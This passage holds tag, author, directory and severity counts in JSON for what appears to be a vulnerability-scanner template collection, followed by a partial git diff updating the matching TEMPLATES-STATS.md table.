nelogin","count":1},{"name":"okiko","count":1},{"name":"portainer","count":1},{"name":"socomec","count":1},{"name":"particle","count":1},{"name":"cors","count":1},{"name":"avalanche","count":1},{"name":"spf","count":1},{"name":"livezilla","count":1},{"name":"whm","count":1},{"name":"karel","count":1},{"name":"mara","count":1},{"name":"pippoint","count":1},{"name":"zzzcms","count":1},{"name":"javamelody","count":1},{"name":"optiLink","count":1},{"name":"beanshell","count":1},{"name":"pgadmin","count":1},{"name":"twitter-server","count":1},{"name":"spotify","count":1},{"name":"fortilogger","count":1},{"name":"billquick","count":1},{"name":"opensns","count":1},{"name":"wavlink","count":1},{"name":"daybyday","count":1},{"name":"st","count":1},{"name":"opentsdb","count":1},{"name":"mysql","count":1},{"name":"csrfguard","count":1},{"name":"sendgrid","count":1},{"name":"blind","count":1},{"name":"tjws","count":1},{"name":"salesforce","count":1},{"name":"domxss","count":1},{"name":"clave","count":1},{"name":"weiphp","count":1},{"name":"apos","count":1},{"name":"securityspy","count":1},{"name":"cobub","count":1},{"name":"pulsesecure","count":1},{"name":"camunda","count":1},{"name":"ognl","count":1},{"name":"seeddms","count":1},{"name":"servicedesk","count":1},{"name":"haproxy","count":1},{"name":"nuxeo","count":1},{"name":"cliniccases","count":1},{"name":"streetview","count":1},{"name":"wix","count":1},{"name":"qdpm","count":1},{"name":"paypal","count":1},{"name":"ntopng","count":1},{"name":"alienvault","count":1},{"name":"meraki","count":1},{"name":"cocoon","count":1},{"name":"photo","count":1},{"name":"mpsec","count":1},{"name":"arl","count":1},{"name":"swagger","count":1},{"name":"expose","count":1},{"name":"mkdocs","count":1},{"name":"pacsone","count":1},{"name":"blue-ocean","count":1},{"name":"acme","count":1},{"name":"asana","count":1},{"name":"dotnet","count":1},{"name":"resourcespace","count":1},{"name":"cloudflare","count":1},{"name":"monitorr","count":1},{"name":"phpfusion","count":1},{"name":"circle","count":1},{"name":"myvuehelp","count":1},{"name":"razor","count":1},{"name":"landrayoa","count":1},{"name":"package","count":1},{"name":" default-login","count":1},{"name":"centreon","count":1},{"name":"intercom","count":1},{"name":"clockwatch","count":1},{"name":"accela","count":1},{"name":"tongda","count":1},{"name":"wakatime","count":1},{"name":"zenario","count":1},{"name":"discord","count":1},{"name":"selea","count":1},{"name":"ssltls","count":1},{"name":"froxlor","count":1},{"name":"dbt","count":1},{"name":"plone","count":1},{"name":"phpwiki","count":1},{"name":"nuuo","count":1},{"name":"grails","count":1},{"name":"nweb2fax","count":1},{"name":"yealink","count":1},{"name":"youtube","count":1},{"name":"office365","count":1},{"name":"mapbox","count":1},{"name":"shopware","count":1},{"name":"simplecrm","count":1},{"name":"jumpcloud","count":1},{"name":"dwsync","count":1},{"name":"mautic","count":1},{"name":"fortigate","count":1},{"name":"zmanda","count":1},{"name":"pendo","count":1},{"name":"openrestry","count":1},{"name":"tinypng","count":1},{"name":"nps","count":1},{"name":"europeana","count":1},{"name":"geocode","count":1},{"name":"messaging","count":1},{"name":"spidercontrol","count":1},{"name":"cerebro","count":1},{"name":"deviantart","count":1},{"name":"xmlchart","count":1},{"name":"calendly","count":1},{"name":"iceflow","count":1},{"name":"buildkite","count":1},{"name":"timezone","count":1},{"name":"bullwark","count":1},{"name":"logontracer","count":1},{"name":"rdp","count":1},{"name":"remkon","count":1},{"name":"fastcgi","count":1},{"name":"umbraco","count":1},{"name":"primetek","count":1},{"name":"goahead","count":1},{"name":"pagerduty","count":1},{"name":"alerta","count":1},{"name":"floc","count":1},{"name":"axiom","count":1},{"name":"metinfo","count":1},{"name":"keenetic","count":1},{"name":"plc","count":1},{"name":"stripe","count":1},{"name":"duomicms","count":1},{"name":"sgp","count":1},{"name":"rsyncd","count":1},{"name":"webui","count":1},{"name":"realteo","count":1},{"name":"monitorix","count":1},{"name":"mariadb","count":1},{"name":"influxdb","count":1},{"name":"appweb","count":1},{"name":"interlib","count":1},{"name":"darkstat","count":1},{"name":"burp","count":1},{"name":"adiscon","count":1},{"name":"netmask","count":1},{"name":"nsasg","count":1},{"name":"upnp","count":1},{"name":"robomongo","count":1},{"name":"labtech","count":1},{"name":"jenzabar","count":1},{"name":"cve2006","count":1},{"name":"uwsgi","count":1},{"name":"wifisky","count":1},{"name":"bookstack","count":1},{"name":"mailgun","count":1},{"name":"owa","count":1},{"name":"eg","count":1},{"name":"iterable","count":1},{"name":"syslog","count":1},{"name":"shoppable","count":1},{"name":"listserv","count":1},{"name":"testrail","count":1},{"name":"gurock","count":1},{"name":"finereport","count":1},{"name":"catfishcms","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"ssl","count":1},{"name":"zookeeper","count":1},{"name":"rijksmuseum","count":1},{"name":"myucms","count":1},{"name":"zyxel","count":1},{"name":"cooperhewitt","count":1},{"name":"ueditor","count":1},{"name":"circontrol","count":1},{"name":"feifeicms","count":1},{"name":"plugin","count":1},{"name":"szhe","count":1},{"name":"kubeflow","count":1},{"name":"landray","count":1},{"name":"dropbox","count":1},{"name":"mrtg","count":1},{"name":"csrf","count":1},{"name":"addpac","count":1},{"name":"biometrics","count":1},{"name":"lokalise","count":1},{"name":"cves2001","count":1},{"name":"zend","count":1},{"name":"pihole","count":1},{"name":"magicflow","count":1},{"name":"acexy","count":1},{"name":"tectuus","count":1},{"name":"fortiweb","count":1},{"name":"skycaiji","count":1},{"name":"anchorcms","count":1},{"name":"sureline","count":1},{"name":"directions","count":1},{"name":"circleci","count":1},{"name":"kyan","count":1},{"name":"smartsense","count":1},{"name":"emc","count":1},{"name":"gsoap","count":1},{"name":"extractor","count":1},{"name":"subrion","count":1},{"name":"gespage","count":1},{"name":"woocommerce","count":1},{"name":"opensmtpd","count":1},{"name":"alibaba","count":1},{"name":"luftguitar","count":1},{"name":"etherpad","count":1},{"name":"elfinder","count":1},{"name":"vscode","count":1},{"name":"ruckus","count":1},{"name":"dompdf","count":1},{"name":"find","count":1},{"name":"codeigniter","count":1},{"name":"dribbble","count":1},{"name":"oscommerce","count":1},{"name":"tileserver","count":1},{"name":"thinkadmin","count":1},{"name":"websphere","count":1},{"name":"mdb","count":1},{"name":"piluscart","count":1},{"name":"lotuscms","count":1},{"name":"openx","count":1},{"name":"qsan","count":1},{"name":"panasonic","count":1},{"name":"sangfor","count":1},{"name":"gateone","count":1},{"name":"roads","count":1},{"name":"smartblog","count":1},{"name":"cve202","count":1},{"name":"crm","count":1},{"name":"dnssec","count":1},{"name":"gloo","count":1},{"name":"secmail","count":1},{"name":"proftpd","count":1},{"name":"planon","count":1},{"name":"clusterengine","count":1},{"name":"nifi","count":1},{"name":"zms","count":1},{"name":"vsphere","count":1},{"name":"gitlist","count":1},{"name":"stem","count":1},{"name":"xmpp","count":1},{"name":"javascript","count":1},{"name":"apigee","count":1},{"name":"fcm","count":1},{"name":"tugboat","count":1},{"name":"ipstack","count":1},{"name":"facebook","count":1},{"name":"jnoj","count":1},{"name":"skywalking","count":1},{"name":"terraform","count":1},{"name":"mobileiron","count":1},{"name":"binance","count":1},{"name":"dreamweaver","count":1},{"name":"details","count":1},{"name":"raspap","count":1},{"name":"taiga","count":1},{"name":"nedi","count":1},{"name":"elascticsearch","count":1},{"name":"traefik","count":1},{"name":"pagespeed","count":1},{"name":"oidc","count":1},{"name":"limit","count":1},{"name":"sage","count":1},{"name":"azkaban","count":1},{"name":"wavemaker","count":1},{"name":"checkpoint","count":1},{"name":"nerdgraph","count":1},{"name":"phpshowtime","count":1},{"name":"setup","count":1},{"name":"gilacms","count":1},{"name":"wiki","count":1},{"name":"ricoh","count":1},{"name":"lighttpd","count":1},{"name":"loganalyzer","count":1},{"name":"sophos","count":1},{"name":"csod","count":1},{"name":"route","count":1},{"name":"bolt","count":1},{"name":"nette","count":1},{"name":"moin","count":1},{"name":"xvr","count":1},{"name":"websvn","count":1},{"name":"tracer","count":1},{"name":"myanimelist","count":1},{"name":"flexbe","count":1},{"name":"beanstalk","count":1},{"name":"timeclock","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"wmt","count":1},{"name":"node-red-dashboard","count":1},{"name":"minimouse","count":1},{"name":"rmc","count":1},{"name":"tor","count":1},{"name":"doh","count":1},{"name":"newrelic","count":1},{"name":"sceditor","count":1},{"name":"ilo4","count":1},{"name":"bing","count":1},{"name":"dbeaver","count":1},{"name":"jsp","count":1},{"name":"etouch","count":1},{"name":"tinymce","count":1},{"name":"strava","count":1},{"name":"yachtcontrol","count":1},{"name":"viewlinc","count":1},{"name":"majordomo2","count":1},{"name":"phalcon","count":1},{"name":"leanix","count":1},{"name":"shiro","count":1},{"name":"graph","count":1},{"name":"scs","count":1},{"name":"ambari","count":1},{"name":"mirai","count":1},{"name":"commscope","count":1},{"name":"cloudinary","count":1},{"name":"frontpage","count":1},{"name":"tpshop","count":1},{"name":"webadmin","count":1},{"name":"viewpoint","count":1},{"name":"glances","count":1},{"name":"opm","count":1},{"name":"trane","count":1},{"name":"avtech","count":1},{"name":"kafdrop","count":1},{"name":"springframework","count":1},{"name":"visualtools","count":1},{"name":"argussurveillance","count":1},{"name":"dnn","count":1},{"name":"tieline","count":1},{"name":"weglot","count":1},{"name":"aniapi","count":1},{"name":"nc2","count":1},{"name":"oneblog","count":1},{"name":"locations","count":1},{"name":"processmaker","count":1},{"name":"wamp","count":1},{"name":"plastic","count":1},{"name":"phpunit","count":1},{"name":"spip","count":1},{"name":"nearby","count":1},{"name":"maxsite","count":1},{"name":"shopxo","count":1},{"name":"pivotaltracker","count":1},{"name":"cvnd","count":1},{"name":"micro-user-service","count":1},{"name":"krweb","count":1},{"name":"sidekiq","count":1},{"name":"sonarcloud","count":1},{"name":"ioncube","count":1},{"name":"elasticsearch","count":1},{"name":"loqate","count":1},{"name":"abuseipdb","count":1},{"name":"cloudron","count":1},{"name":"concrete","count":1},{"name":"omi","count":1},{"name":"motorola","count":1},{"name":"rujjie","count":1},{"name":"opencast","count":1},{"name":"hiboss","count":1},{"name":"webmin","count":1},{"name":"travis","count":1},{"name":"totaljs","count":1},{"name":"elevation","count":1},{"name":"alertmanager","count":1},{"name":"nimble","count":1},{"name":"moinmoin","count":1},{"name":"ghost","count":1},{"name":"wp","count":1},{"name":"flink","count":1},{"name":"gitea","count":1},{"name":"bedita","count":1},{"name":"jquery","count":1},{"name":"hortonworks","count":1},{"name":"ulterius","count":1},{"name":"gridx","count":1},{"name":"distance","count":1},{"name":"geolocation","count":1},{"name":"sast","count":1},{"name":"placeos","count":1},{"name":"lancom","count":1},{"name":"aura","count":1},{"name":"calendarix","count":1},{"name":"email","count":1},{"name":"natemail","count":1},{"name":"redwood","count":1},{"name":"vnc","count":1},{"name":"maccmsv10","count":1},{"name":"eyou","count":1},{"name":"mantis","count":1},{"name":"wing-ftp","count":1},{"name":"zcms","count":1},{"name":"weather","count":1},{"name":"apiman","count":1},{"name":"gogs","count":1},{"name":"sprintful","count":1},{"name":"saltapi","count":1},{"name":"yzmcms","count":1},{"name":"acontent","count":1},{"name":"imap","count":1},{"name":"diris","count":1},{"name":"phpinfo","count":1},{"name":"fedora","count":1},{"name":"cofax","count":1},{"name":"matrix","count":1},{"name":"adb","count":1},{"name":"clickhouse","count":1},{"name":"shopizer","count":1},{"name":"fastapi","count":1},{"name":"bazarr","count":1},{"name":"klog","count":1},{"name":"dahua","count":1},{"name":"netgenie","count":1},{"name":"adafruit","count":1},{"name":"wazuh","count":1},{"name":"trilithic","count":1},{"name":"zte","count":1},{"name":"svnserve","count":1},{"name":"werkzeug","count":1},{"name":"varnish","count":1},{"name":"jeewms","count":1}],"authors":[{"name":"dhiyaneshdk","count":309},{"name":"daffainfo","count":304},{"name":"pikpikcu","count":281},{"name":"pdteam","count":208},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":152},{"name":"gy741","count":85},{"name":"pussycat0x","count":76},{"name":"princechaddha","count":67},{"name":"madrobot","count":65},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":60},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"r3dg33k","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"nadino","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":10},{"name":"melbadry9","count":10},{"name":"random_robbie","count":10},{"name":"meme-lord","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"emadshanab","count":8},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"puzzlepeaches","count":6},{"name":"johnk3r","count":6},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"__fazal","count":6},{"name":"divya_mudgal","count":6},{"name":"caspergn","count":6},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"iamnoooob","count":5},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"tess","count":4},{"name":"wisnupramoedya","count":4},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"sullo","count":3},{"name":"unstabl3","count":3},{"name":"alifathi-h1","count":3},{"name":"fyoorer","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"github.com/its0x08","count":3},{"name":"impramodsargar","count":3},{"name":"idealphase","count":3},{"name":"forgedhallpass","count":3},{"name":"emenalf","count":3},{"name":"dudez","count":3},{"name":"johnjhacking","count":3},{"name":"jarijaas","count":3},{"name":"thomas_from_offensity","count":3},{"name":"andydoering","count":3},{"name":"vsh00t","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"socketz","count":2},{"name":"randomrobbie","count":2},{"name":"nkxxkn","count":2},{"name":"ehsahil","count":2},{"name":"bing0o","count":2},{"name":"vavkamil","count":2},{"name":"lotusdll","count":2},{"name":"moritz nentwig","count":2},{"name":"hetroublemakr","count":2},{"name":"dahse89","count":2},{"name":"manas_harsh","count":2},{"name":"sy3omda","count":2},{"name":"convisoappsec","count":2},{"name":"gevakun","count":2},{"name":"hahwul","count":2},{"name":"joeldeleep","count":2},{"name":"kiblyn11","count":2},{"name":"lark-lab","count":2},{"name":"0xcrypto","count":2},{"name":"davidmckennirey","count":2},{"name":"arcc","count":2},{"name":"random-robbie","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"koti2","count":2},{"name":"swissky","count":2},{"name":"whoever","count":2},{"name":"x1m_martijn","count":2},{"name":"huowuzhao","count":2},{"name":"afaq","count":2},{"name":"bp0lr","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xelkomy","count":2},{"name":"mohammedsaneem","count":2},{"name":"fabaff","count":2},{"name":"r3naissance","count":2},{"name":"gal nagli","count":2},{"name":"bsysop","count":2},{"name":"alph4byt3","count":2},{"name":"pxmme1337","count":2},{"name":"bernardofsr","count":2},{"name":"udit_thakkur","count":2},{"name":"r12w4n","count":2},{"name":"ree4pwn","count":2},{"name":"parth","count":2},{"name":"0xsmiley","count":2},{"name":"martincodes-de","count":2},{"name":"its0x08","count":2},{"name":"0xsapra","count":2},{"name":"0xprial","count":2},{"name":"amsda","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"zomsop82","count":2},{"name":"cocxanh","count":2},{"name":"w4cky_","count":2},{"name":"foulenzer","count":2},{"name":"sshell","count":1},{"name":"dawid-czarnecki","count":1},{"name":"b0rn2r00t","count":1},{"name":"kaizensecurity","count":1},{"name":"lethargynavigator","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"d0rkerdevil","count":1},{"name":"alex","count":1},{"name":"smaranchand","count":1},{"name":"noamrathaus","count":1},{"name":"thebinitghimire","count":1},{"name":"rodnt","count":1},{"name":"mesaglio","count":1},{"name":"hakluke","count":1},{"name":"adrianmf","count":1},{"name":"charanrayudu","count":1},{"name":"0xrod","count":1},{"name":"hanlaomo","count":1},{"name":"sicksec","count":1},{"name":"notsoevilweasel","count":1},{"name":"nytr0gen","count":1},{"name":"regala_","count":1},{"name":"infosecsanyam","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"yashgoti","count":1},{"name":"0ut0fb4nd","count":1},{"name":"furkansenan","count":1},{"name":"undefl0w","count":1},{"name":"push4d","count":1},{"name":"bjhulst","count":1},{"name":"philippdelteil","count":1},{"name":"naglinagli","count":1},{"name":"retr02332","count":1},{"name":"ldionmarcil","count":1},{"name":"mhdsamx","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"gboddin","count":1},{"name":"@dwisiswant0","count":1},{"name":"b4uh0lz","count":1},{"name":"yashanand155","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"akash.c","count":1},{"name":"igibanez","count":1},{"name":"thevillagehacker","count":1},{"name":"patralos","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"retr0","count":1},{"name":"0xtavian","count":1},{"name":"borna nematzadeh","count":1},{"name":"elder tao","count":1},{"name":"j33n1k4","count":1},{"name":"petruknisme","count":1},{"name":"oscarintherocks","count":1},{"name":"evolutionsec","count":1},{"name":"knassar702","count":1},{"name":"makyotox","count":1},{"name":"bolli95","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"xstp","count":1},{"name":"kareemse1im","count":1},{"name":"affix","count":1},{"name":"akshansh","count":1},{"name":"luci","count":1},{"name":"fopina","count":1},{"name":"udyz","count":1},{"name":"willd96","count":1},{"name":"shelld3v","count":1},{"name":"@ofjaaah","count":1},{"name":"soyelmago","count":1},{"name":"omarkurt","count":1},{"name":"zandros0","count":1},{"name":"taielab","count":1},{"name":"kabirsuda","count":1},{"name":"0xd0ff9","count":1},{"name":"wabafet","count":1},{"name":"vzamanillo","count":1},{"name":"elouhi","count":1},{"name":"pudsec","count":1},{"name":"remonsec","count":1},{"name":"toufik airane","count":1},{"name":"th3.d1p4k","count":1},{"name":"andirrahmani1","count":1},{"name":"pratik khalane","count":1},{"name":"florianmaak","count":1},{"name":"bad5ect0r","count":1},{"name":"cookiehanhoan","count":1},{"name":"sbani","count":1},{"name":"absshax","count":1},{"name":"mubassirpatel","count":1},{"name":"micha3lb3n","count":1},{"name":"52971","count":1},{"name":"schniggie","count":1},{"name":"alperenkesk","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"luskabol","count":1},{"name":"raesene","count":1},{"name":"x6263","count":1},{"name":"husain","count":1},{"name":"majidmc2","count":1},{"name":"elmahdi","count":1},{"name":"jeya seelan","count":1},{"name":"shifacyclewla","count":1},{"name":"0h1in9e","count":1},{"name":"ringo","count":1},{"name":"shreyapohekar","count":1},{"name":"izn0u","count":1},{"name":"blckraven","count":1},{"name":"tirtha_mandal","count":1},{"name":"defr0ggy","count":1},{"name":"streetofhackerr007","count":1},{"name":"0xteles","count":1},{"name":"tim_koopmans","count":1},{"name":"berkdusunur","count":1},{"name":"brabbit10","count":1},{"name":"ilovebinbash","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"harshinsecurity","count":1},{"name":"thezakman","count":1},{"name":"sec_hawk","count":1},{"name":"becivells","count":1},{"name":"ooooooo_q","count":1},{"name":"0xh7ml","count":1},{"name":"co0nan","count":1},{"name":"exploitation","count":1},{"name":"yavolo","count":1},{"name":"jteles","count":1},{"name":"_c0wb0y_","count":1},{"name":"pdp","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"rotemreiss","count":1},{"name":"fmunozs","count":1},{"name":"mah3sec_","count":1},{"name":"ahmetpergamum","count":1},{"name":"juicypotato1","count":1},{"name":"andysvints","count":1},{"name":"qlkwej","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"deena","count":1},{"name":"apt-mirror","count":1},{"name":"sickwell","count":1},{"name":"zhenwarx","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"geraldino2","count":1},{"name":"iampritam","count":1},{"name":"c3l3si4n","count":1},{"name":"jrolf","count":1},{"name":"s1r1u5_","count":1},{"name":"whynotke","count":1},{"name":"aresx","count":1},{"name":"ajaysenr","count":1},{"name":"kurohost","count":1},{"name":"daviey","count":1},{"name":"clarkvoss","count":1},{"name":"b0yd","count":1},{"name":"intx0x80","count":1},{"name":"mass0ma","count":1},{"name":"_0xf4n9x_","count":1},{"name":"un-fmunozs","count":1},{"name":"nerrorsec","count":1},{"name":"flag007","count":1},{"name":"ipanda","count":1},{"name":"orpheus","count":1},{"name":"manuelbua","count":1},{"name":"droberson","count":1},{"name":"rojanrijal","count":1},{"name":"chron0x","count":1},{"name":"jiheon-dev","count":1},{"name":"ahmed sherif","count":1},{"name":"lark lab","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_harleo","count":1},{"name":"kre80r","count":1},{"name":"nvn1729","count":1},{"name":"revblock","count":1},{"name":"_darrenmartyn","count":1},{"name":"ohlinge","count":1}],"directory":[{"name":"cves","count":856},{"name":"vulnerabilities","count":333},{"name":"exposed-panels","count":289},{"name":"technologies","count":210},{"name":"exposures","count":199},{"name":"misconfiguration","count":148},{"name":"token-spray","count":98},{"name":"takeovers","count":66},{"name":"default-logins","count":61},{"name":"file","count":57},{"name":"workflows","count":42},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":23},{"name":"dns","count":12},{"name":"cnvd","count":10},{"name":"fuzzing","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":833},{"name":"high","count":659},{"name":"medium","count":493},{"name":"critical","count":303},{"name":"low","count":158}],"types":[{"name":"http","count":2326},{"name":"file","count":57},{"name":"network","count":46},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 320f1a6be8..2467bd2d28 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,964 +1,989 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | -| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | -| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | -| wordpress | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | -| xss | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | -| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | -| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | -| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | -| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | -| cve2021 | 160 | zzeitlin | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 58 | iot | 36 | | | | | +| cve | 852 | dhiyaneshdk | 309 | cves | 856 | info | 833 | http | 2326 | +| lfi | 350 | daffainfo | 304 | vulnerabilities | 333 | high | 659 | file | 57 | +| panel | 295 | pikpikcu | 281 | exposed-panels | 289 | medium | 493 | network | 46 | +| xss | 266 | pdteam | 208 | technologies | 210 | critical | 303 | dns | 12 | +| wordpress | 262 | geeknik | 172 | exposures | 199 | low | 158 | | | +| exposure | 250 | dwisiswant0 | 152 | misconfiguration | 148 | | | | | +| rce | 221 | gy741 | 85 | token-spray | 98 | | | | | +| tech | 204 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 61 | | | | | +| cve2021 | 166 | madrobot | 65 | file | 57 | | | | | +| cve2020 | 166 | zzeitlin | 63 | workflows | 42 | | | | | +| joomla | 128 | 0x_akoko | 60 | iot | 36 | | | | | | cve2010 | 109 | gaurang | 42 | network | 33 | | | | | -| config | 99 | philippedelteil | 31 | miscellaneous | 24 | | | | | -| cve2019 | 98 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 92 | organiccrap | 24 | cnvd | 10 | | | | | -| token-spray | 83 | pr3r00t | 15 | fuzzing | 10 | | | | | -| iot | 80 | sheikhrishad | 15 | headless | 5 | | | | | -| apache | 74 | milo2012 | 14 | | | | | | | -| oast | 71 | techbrunchfr | 13 | | | | | | | +| config | 99 | philippedelteil | 31 | miscellaneous | 23 | | | | | +| cve2019 | 99 | ice3man | 26 | dns | 12 | | | | | +| token-spray | 98 | organiccrap | 24 | fuzzing | 10 | | | | | +| cve2018 | 93 | pr3r00t | 15 | cnvd | 10 | | | | | +| iot | 81 | sheikhrishad | 15 | headless | 5 | | | | | +| apache | 75 | milo2012 | 14 | | | | | | | +| oast | 74 | techbrunchfr | 13 | | | | | | | | takeover | 70 | suman_kar | 12 | | | | | | | -| default-login | 68 | cyllective | 11 | | | | | | | -| token | 67 | r3dg33k | 11 | | | | | | | -| file | 51 | random_robbie | 10 | | | | | | | -| cve2017 | 51 | wdahlenb | 10 | | | | | | | -| unauth | 50 | righettod | 10 | | | | | | | -| network | 44 | nadino | 10 | | | | | | | -| ssrf | 42 | melbadry9 | 10 | | | | | | | -| sqli | 41 | hackergautam | 9 | | | | | | | -| cve2016 | 39 | iamthefrogy | 8 | | | | | | | -| | 39 | zh | 8 | | | | | | | -| redirect | 38 | aashiq | 8 | | | | | | | -| oracle | 37 | that_juan_ | 8 | | | | | | | -| google | 30 | harshbothra_ | 7 | | | | | | | -| cve2015 | 30 | kophjager007 | 7 | | | | | | | -| logs | 30 | oppsec | 7 | | | | | | | -| atlassian | 29 | techryptic (@tech) | 7 | | | | | | | -| jira | 29 | emadshanab | 7 | | | | | | | -| cisco | 28 | 0x240x23elu | 7 | | | | | | | -| cve2014 | 27 | meme-lord | 7 | | | | | | | -| listing | 27 | randomstr1ng | 7 | | | | | | | -| auth-bypass | 25 | dogasantos | 7 | | | | | | | -| generic | 24 | dr_set | 7 | | | | | | | -| misconfig | 23 | __fazal | 6 | | | | | | | -| misc | 23 | puzzlepeaches | 6 | | | | | | | -| disclosure | 23 | divya_mudgal | 6 | | | | | | | -| router | 22 | logicalhunter | 6 | | | | | | | -| aem | 19 | johnk3r | 6 | | | | | | | -| cve2012 | 18 | pentest_swissky | 6 | | | | | | | -| sap | 18 | caspergn | 6 | | | | | | | -| springboot | 18 | xelkomy | 5 | | | | | | | -| debug | 17 | ganofins | 5 | | | | | | | -| php | 15 | joanbono | 5 | | | | | | | -| cve2011 | 15 | panch0r3d | 5 | | | | | | | -| devops | 15 | elsfa7110 | 5 | | | | | | | -| weblogic | 15 | rootxharsh | 5 | | | | | | | -| fuzz | 14 | lu4nx | 5 | | | | | | | -| wp-theme | 14 | yanyun | 5 | | | | | | | -| login | 14 | iamnoooob | 5 | | | | | | | -| aws | 14 | incogbyte | 4 | | | | | | | -| cve2009 | 14 | nodauf | 4 | | | | | | | -| struts | 14 | github.com/its0x08 | 4 | | | | | | | -| deserialization | 13 | tess | 4 | | | | | | | -| dns | 13 | wisnupramoedya | 4 | | | | | | | -| adobe | 13 | e_schultze_ | 4 | | | | | | | -| zoho | 13 | f1tz | 3 | | | | | | | +| default-login | 69 | r3dg33k | 12 | | | | | | | +| token | 68 | cyllective | 11 | | | | | | | +| file | 57 | hackergautam | 10 | | | | | | | +| cve2017 | 52 | righettod | 10 | | | | | | | +| unauth | 50 | wdahlenb | 10 | | | | | | | +| network | 44 | melbadry9 | 10 | | | | | | | +| ssrf | 44 | random_robbie | 10 | | | | | | | +| | 42 | nadino | 10 | | | | | | | +| sqli | 41 | zh | 8 | | | | | | | +| cve2016 | 39 | aashiq | 8 | | | | | | | +| redirect | 38 | that_juan_ | 8 | | | | | | | +| oracle | 37 | iamthefrogy | 8 | | | | | | | +| logs | 35 | emadshanab | 8 | | | | | | | +| google | 30 | meme-lord | 8 | | | | | | | +| cve2015 | 30 | oppsec | 7 | | | | | | | +| misconfig | 30 | techryptic (@tech) | 7 | | | | | | | +| atlassian | 29 | harshbothra_ | 7 | | | | | | | +| jira | 29 | 0x240x23elu | 7 | | | | | | | +| cisco | 28 | randomstr1ng | 7 | | | | | | | +| listing | 27 | dogasantos | 7 | | | | | | | +| cve2014 | 27 | kophjager007 | 7 | | | | | | | +| auth-bypass | 25 | dr_set | 7 | | | | | | | +| generic | 24 | puzzlepeaches | 6 | | | | | | | +| misc | 22 | pentest_swissky | 6 | | | | | | | +| disclosure | 22 | __fazal | 6 | | | | | | | +| router | 22 | caspergn | 6 | | | | | | | +| aem | 19 | divya_mudgal | 6 | | | | | | | +| debug | 18 | logicalhunter | 6 | | | | | | | +| sap | 18 | johnk3r | 6 | | | | | | | +| springboot | 18 | panch0r3d | 5 | | | | | | | +| cve2012 | 18 | yanyun | 5 | | | | | | | +| fuzz | 15 | rootxharsh | 5 | | | | | | | +| cve2011 | 15 | joanbono | 5 | | | | | | | +| wp-theme | 15 | xelkomy | 5 | | | | | | | +| php | 15 | lu4nx | 5 | | | | | | | +| aws | 15 | elsfa7110 | 5 | | | | | | | +| weblogic | 15 | 